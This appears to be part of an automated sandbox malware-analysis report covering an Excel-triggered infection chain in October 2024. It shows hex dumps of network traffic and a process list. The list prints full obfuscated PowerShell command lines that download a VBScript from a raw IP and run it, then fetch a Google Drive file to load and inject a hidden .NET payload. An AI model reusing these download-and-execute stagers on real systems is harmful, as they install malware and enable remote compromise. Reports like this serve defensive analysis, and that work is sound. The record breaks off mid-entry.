                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2 5b d3 06 21 bd 54 05 fe b9 f5 2f da 8c 48 e3 ec f0 92 2d 81 7c 35 00 66 61 46 b6 f4 e7 3c 34 12 c7 b4 a2
                                                                                              Data Ascii: '6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg[!T/H-|5faF<4
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46 d3 f1 f8 e6 63 11 a7 d4 37 3c 01 54 7b e0 0e 5d b1 bd 58 06 85 71 f0 c3 94 4f ba 05 25 43 37 3d 31 49 63
                                                                                              Data Ascii: )XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEFc7<T{]XqO%C7=1Ic
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48 6f c3 75 57 99 1a f9 8f dd 9d 23 da c0 b7 2c 3a e6 e4 de 1f 02 10 91 32 83 b4 b0 b4 04 03 5d c5 67 99 93
                                                                                              Data Ascii: 2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiHouW#,:2]g
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22 0e 24 91 46 d1 1c 7f c2 45 8e 4f 6e 95 99 7b 3c 5f c5 90 05 8c 41 a6 6b 62 45 20 6b b2 49 fe 23 77 db 8c
                                                                                              Data Ascii: G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7"@'m"$FEOn{<_AkbE kI#w
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 04 17 60 0f ca f0 10 9d dc 00 a6 82 df 04 1e bf 4c 59 1e 35 d4 ac 80 30 2a c1 a8 f7 ae 72 e4 93 a8 60 7d
                                                                                              Data Ascii: 2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg`LY50*r`}
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 ab 10 1b 49 ef 79 e5 9a 79 e3 05 0b 1b 53 d7 bd e0 7b 2d 3c a8 58 a1 75 0c 0f 17 df 0b a9 9d 9b 4a 51 59 42 a9 e2 bd fd b3 c5 cb aa d5 ee 0f 23 b2 9a e0 91 57 84 83 57
                                                                                              Data Ascii: h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-TtIyyS{-<XuJQYB#WW


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:02:39:05
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0x13fee0000
                                                                                              File size:28'253'536 bytes
                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:02:39:28
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                              Imagebase:0x13f6e0000
                                                                                              File size:13'824 bytes
                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:02:39:33
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:02:39:37
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:02:39:40
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
                                                                                              Imagebase:0x13f320000
                                                                                              File size:2'758'280 bytes
                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:02:39:41
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
                                                                                              Imagebase:0x13fde0000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:02:39:46
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
                                                                                              Imagebase:0xff5e0000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:12
                                                                                              Start time:02:39:47
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:14
                                                                                              Start time:02:39:49
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:15
                                                                                              Start time:02:39:50
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                              Imagebase:0x13f170000
                                                                                              File size:13'824 bytes
                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:17
                                                                                              Start time:02:39:54
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:19
                                                                                              Start time:02:39:55
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:21
                                                                                              Start time:02:39:57
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
                                                                                              Imagebase:0x13f240000
                                                                                              File size:2'758'280 bytes
                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:22
                                                                                              Start time:02:39:58
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
                                                                                              Imagebase:0x13f6c0000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
